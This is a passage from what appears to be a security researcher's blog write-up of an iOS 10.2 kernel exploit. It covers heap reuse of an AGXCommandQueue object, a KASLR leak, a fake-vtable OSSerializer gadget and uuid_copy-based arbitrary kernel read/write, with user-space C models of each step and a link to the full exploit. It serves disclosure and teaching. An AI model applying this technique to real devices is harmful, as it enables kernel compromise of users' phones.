alloc_userclient allocates user client type 5 of the AGXAccelerator IOService which is an AGXCommandQueue object. IOKit’s default operator new uses kalloc and AGXCommandQueue is 0xdb8 bytes so it will also use the kalloc.4096 zone and reuse the memory just freed by the second_port ipc_kmsg.

Note that we sent another message with a valid header to first_port which overwrote second_port’s header with a valid header. This is so that after second_port is freed and the memory reused for the user client we can dequeue the message from first_port and read back the first 240 bytes of the AGXCommandQueue object. The first qword is a pointer to the AGXCommandQueue’s vtable; using this we can determine the KASLR slide and thus work out the address of OSSerializer::serialize.
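The slide calculation itself is a single subtraction followed by an addition. In the sketch below the function names are hypothetical, and the unslid addresses are assumed to come from static analysis of the matching kernelcache; no real addresses are implied.

```c
#include <assert.h>
#include <stdint.h>

/* KASLR slide: the difference between a pointer leaked at runtime and the
 * unslid value of that same pointer in the kernelcache on disk. */
static uint64_t kaslr_slide(uint64_t leaked, uint64_t unslid)
{
    assert(leaked >= unslid);
    return leaked - unslid;
}

/* Runtime address of any other symbol in the same image. */
static uint64_t slide_address(uint64_t unslid, uint64_t slide)
{
    return unslid + slide;
}
```

For example, with made-up values, a vtable pointer that is 0xfffffff006f00000 on disk and leaks as 0xfffffff01af00000 gives a slide of 0x14000000, which is then added to the on-disk address of OSSerializer::serialize.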

Calling any IOKit MIG method on the AGXCommandQueue userclient will likely result in at least three virtual calls: ::retain() will be called by iokit_lookup_connect_port by the MIG intran for the userclient port. This method also calls ::getMetaClass(). Finally the MIG wrapper will call iokit_remove_connect_reference which will call ::release().

Since these are all C++ virtual methods they will pass the this pointer as the first (implicit) argument meaning that we should be able to fulfil the requirement to be able to use the OSSerializer::serialize gadget. Let’s look more closely at exactly how that works:

class OSSerializer : public OSObject
{
 OSDeclareDefaultStructors(OSSerializer)

 void * target;
 void * ref;
 OSSerializerCallback callback;

 virtual bool serialize(OSSerialize * serializer) const;
};

bool OSSerializer::serialize( OSSerialize * s ) const
{
 return( (*callback)(target, ref, s) );
}

It’s clearer what’s going on if we look at the disassembly of OSSerializer::serialize:

; OSSerializer::serialize(OSSerializer *__hidden this, OSSerialize *)

MOV  X8, X1
LDP  X1, X3, [X0,#0x18] ; load X1 from [X0+0x18] and X3 from [X0+0x20]
LDR  X9, [X0,#0x10]     ; load X9 from [X0+0x10]
MOV  X0, X9
MOV  X2, X8
BR   X3                 ; call [X0+0x20] with X0=[X0+0x10] and X1=[X0+0x18]
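
The same behaviour can be modelled in plain C, which makes it easier to see why controlling the bytes at offsets 0x10, 0x18 and 0x20 is enough. This is only a user-space sketch assuming a 64-bit (LP64) platform; the struct and function names are invented for illustration and are not XNU code.

```c
#include <assert.h>
#include <stddef.h>
#include <stdint.h>

typedef int (*callback_fn)(void *target, void *ref, void *s);

/* Mirrors the offsets the disassembly reads from, assuming 8-byte pointers. */
struct fake_serializer {
    void       *vtable;       /* +0x00 */
    uint64_t    retain_count; /* +0x08: slot used by OSObject's reference count */
    void       *target;       /* +0x10: ends up in X0 */
    void       *ref;          /* +0x18: ends up in X1 */
    callback_fn callback;     /* +0x20: branch target */
};

/* Stand-in for OSSerializer::serialize: the one pointer we are called with
 * supplies both the function to call and its first two arguments. */
static int serialize_gadget(const struct fake_serializer *self, void *s)
{
    assert(offsetof(struct fake_serializer, target) == 0x10);
    assert(offsetof(struct fake_serializer, ref) == 0x18);
    assert(offsetof(struct fake_serializer, callback) == 0x20);
    return self->callback(self->target, self->ref, s);
}

/* Demo callback which just records the two arguments it was given. */
static void *seen_arg0, *seen_arg1;

static int record_args(void *arg0, void *arg1, void *s)
{
    (void)s; /* the third argument is not under our control */
    seen_arg0 = arg0;
    seen_arg1 = arg1;
    return 1;
}
```

Whoever controls the memory self points to chooses callback, target and ref; the third argument is whatever happened to be in X1 when the gadget was entered.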

Since we have read/write access to the first 240 bytes of the AGXCommandQueue userclient and we know where it is in memory we can replace it with a fake object which will turn a virtual call to ::release into a call to an arbitrary function pointer with two controlled arguments.

We’ve redirected the vtable pointer to point back to this object so we can interleave the vtable entries we need along with the data. We now just need one more primitive on top of this to turn an arbitrary function call with two controlled arguments into an arbitrary memory read/write.
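
A user-space sketch of that self-referential layout might look like the following. The vtable offset inside the object and the three slot indices are assumptions chosen for the example (they are not taken from the exploit), and the harmless no-op methods stand in for whatever benign kernel functions the ::retain and ::getMetaClass entries would really need to point to.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

#define OBJ_QWORDS   30   /* 240 bytes: the window we can read and write */
#define VTABLE_OFF   0x30 /* assumed: where the fake vtable starts in the object */
#define SLOT_RETAIN  4    /* assumed vtable slot indices, for illustration only */
#define SLOT_RELEASE 5
#define SLOT_GETMETA 7

typedef uint64_t (*virt_fn)(uint64_t *self);
typedef uint64_t (*two_arg_fn)(uint64_t arg0, uint64_t arg1);

/* Stand-in for a harmless method: does nothing and returns 0. */
static uint64_t nop_method(uint64_t *self) { (void)self; return 0; }

/* Stand-in for OSSerializer::serialize: call [self+0x20]([self+0x10], [self+0x18]). */
static uint64_t serialize_standin(uint64_t *self)
{
    two_arg_fn fn = (two_arg_fn)(uintptr_t)self[4];
    return fn(self[2], self[3]);
}

static void build_fake_object(uint64_t *obj, two_arg_fn fn,
                              uint64_t arg0, uint64_t arg1)
{
    uint64_t *vtable = obj + VTABLE_OFF / 8;

    /* the vtable entries must land inside the 240 bytes we control */
    assert(VTABLE_OFF / 8 + SLOT_GETMETA < OBJ_QWORDS);
    memset(obj, 0, OBJ_QWORDS * sizeof(uint64_t));

    obj[0] = (uint64_t)(uintptr_t)vtable; /* vtable pointer points back into the object */
    obj[2] = arg0;                        /* +0x10: first controlled argument */
    obj[3] = arg1;                        /* +0x18: second controlled argument */
    obj[4] = (uint64_t)(uintptr_t)fn;     /* +0x20: function to call */

    vtable[SLOT_RETAIN]  = (uint64_t)(uintptr_t)nop_method;
    vtable[SLOT_GETMETA] = (uint64_t)(uintptr_t)nop_method;
    vtable[SLOT_RELEASE] = (uint64_t)(uintptr_t)serialize_standin;
}

/* What a C++ virtual call does: load the vtable from the object, load the
 * slot from the vtable, then call it with the object as "this". */
static uint64_t virtual_call(uint64_t *obj, int slot)
{
    uint64_t *vtable = (uint64_t *)(uintptr_t)obj[0];
    virt_fn fn = (virt_fn)(uintptr_t)vtable[slot];
    return fn(obj);
}

/* Demo target for the controlled two-argument call. */
static uint64_t add_two(uint64_t a, uint64_t b) { return a + b; }
```

With the vtable placed at 0x30 the slots used here sit at 0x50, 0x58 and 0x68, clear of the three gadget fields at 0x10 to 0x20, which is the interleaving the text describes.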

Functions like copyin and copyout are the obvious candidates as they will handle any complexities involved in copying across the user/kernel boundary but they both take three arguments: source, destination and size and we can only completely control two.

However since we already have the ability to read and write this fake object from userspace we can actually just copy values to and from this kernel buffer rather than having to copy to and from userspace directly. This means we can expand our search to any memory copying functions like memcpy. Of course memcpy, memmove and bcopy all also take three arguments so what we need is a wrapper around one of those which passes a fixed size.

Looking through the cross-references to those functions we find uuid_copy:

; uuid_copy(uuid_t dst, const uuid_t src)
MOV  W2, #0x10 ; size
B    _memmove

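This function is just a simple wrapper around memmove which always passes a fixed size of 16 bytes. Integrating that final primitive into the serializer gadget means pointing the callback at uuid_copy, with the two controlled arguments as its destination and source. Copying from a buffer inside our fake userclient object to an arbitrary address gives us a write.

To make the write into a read we just swap the order of the arguments to copy from an arbitrary address into our fake userclient object, then receive the exception message to read back the data.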
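
The two directions can be modelled in user space like this. It is a sketch only: call_with_two_args stands in for the whole "trigger ::release on the fake object" step, scratch stands in for 16 bytes inside the fake object that userspace can both set and read back via messages, and all of the names are hypothetical.

```c
#include <assert.h>
#include <stdint.h>
#include <string.h>

/* Stand-in for uuid_copy: a memmove with the size fixed at 16 bytes. */
static void uuid_copy_standin(void *dst, const void *src)
{
    memmove(dst, src, 16);
}

/* Stand-in for triggering the gadget: the two controlled arguments are
 * simply forwarded to the fixed-size copy. */
static void call_with_two_args(void *arg0, const void *arg1)
{
    assert(arg0 != NULL && arg1 != NULL);
    uuid_copy_standin(arg0, arg1);
}

/* 16 bytes inside the fake object which we can fill in by sending a message
 * and read back by receiving one; modelled here as a plain buffer. */
static uint8_t scratch[16];

/* Write: stage the data in the fake object, then copy scratch -> target. */
static void write16(void *target, const uint8_t data[16])
{
    memcpy(scratch, data, 16);
    call_with_two_args(target, scratch);
}

/* Read: same call with the arguments swapped, target -> scratch, then
 * read the fake object back. */
static void read16(const void *target, uint8_t out[16])
{
    call_with_two_args(scratch, target);
    memcpy(out, scratch, 16);
}
```

Each call moves exactly 16 bytes, so larger reads and writes would be built by repeating the primitive over consecutive addresses.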

You can download my exploit for iOS 10.2 on iPod 6G here: https://bugs.chromium.org/p/project-zero/issues/detail?id=1004#c4

This bug was also independently discovered and exploited by Marco Grassi and qwertyoruiopz. Check out their code to see a different approach to exploiting this bug which also uses mach ports.

Critical code should be criticised
Every developer makes mistakes and they’re a natural part of the software development process (especially when the compiler is egging you on!). However, brand new kernel code on the 1B+ devices running XNU deserves special attention. In my opinion this bug was a clear failure of the code review processes in place at Apple and I hope bugs and writeups like these are taken seriously and some lessons are learnt from them.

Perhaps most importantly: I think this bug would have been caught in development if the code had any tests. As well as having a critical security bug the code just doesn’t work at all for a recipe with a size greater than 256. On MacOS such a test would immediately kernel panic. I find it consistently surprising that the coding standards for such critical codebases don’t enforce the development of even basic regression tests.

XNU is not alone in this; it’s a common story across many codebases. For example, LG shipped an Android kernel with a new custom syscall containing a trivial unbounded strcpy that was triggered by Chrome’s normal operation. For extra irony, the custom syscall collided with the syscall number for sys_seccomp, the exact feature Chrome were trying to add support for to prevent such issues from being exploitable.

3 comments:

  1. Absolutely amazing work once again

  2. One of my coding rules is to trace through every code branch at least once, just to make sure that it works at all, even if I don't write persistent (unit) test code for it. If that had been done here, the bug would have been obvious as soon as the code segment for (sz >= MACH_VOUCHER_TRAP_STACK_LIMIT) had been stepped through. Simple rule but very important.

  3. Thank you for this! I've been itching to dive into mobile pen testing. My background is more in x86 stack-based pentesting, which I used to enjoy as a hobby during my teenage years, and this has rekindled my love for software hacking. I'm finding it generally difficult to dive into pentesting on iOS at all due to limited access from a non-jailbroken iPhone. Thanks again for this lovely breakdown!
